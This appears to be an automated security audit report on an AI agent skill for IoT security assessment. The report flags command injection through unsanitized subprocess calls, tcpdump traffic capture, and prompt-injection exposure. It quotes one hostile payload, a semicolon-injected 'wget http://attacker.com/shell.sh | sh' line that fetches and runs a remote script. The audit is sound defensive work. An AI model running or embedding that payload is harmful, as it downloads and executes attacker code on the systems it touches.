performing-iot-security-assessment

Fail

Audited by Gen Agent Trust Hub on Apr 21, 2026

Risk Level: CRITICAL (REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION)
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The SKILL.md file contains an explicit payload example, "; wget http://attacker.com/shell.sh | sh", within a security scenario description. This pattern represents a direct piped execution of a remote script from an untrusted source.
  • [COMMAND_EXECUTION]: The Python script scripts/agent.py makes extensive use of the subprocess.run() function to execute system tools including nmap, curl, binwalk, tcpdump, and openssl. User-supplied parameters such as target_ip, output_dir, and firmware_path are interpolated directly into shell commands without validation or sanitization, which allows for arbitrary command injection if an attacker can influence these inputs.
  • [DATA_EXFILTRATION]: The capture_traffic method in scripts/agent.py utilizes tcpdump to capture host-specific network traffic. While intended for security analysis, this capability can be abused to capture and expose sensitive network communications.
  • [INDIRECT_PROMPT_INJECTION]: The skill processes untrusted external data (firmware images) and its documentation contains actionable exploit strings.
      • Ingestion points: Firmware images provided by users and extracted filesystem content are processed by the agent.
      • Boundary markers: None observed; the agent processes findings and prints them directly to the console/JSON reports.
      • Capability inventory: The skill has significant capabilities including network scanning, file system writes, and traffic capture via subprocess calls in scripts/agent.py.
      • Sanitization: There is no evidence of sanitization for paths or IP addresses before they are used in shell commands.
Recommendations
  • HIGH: Downloads and executes remote code from: http://attacker.com/shell.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
  • Risk Level: CRITICAL
  • Analyzed: Apr 21, 2026, 12:22 AM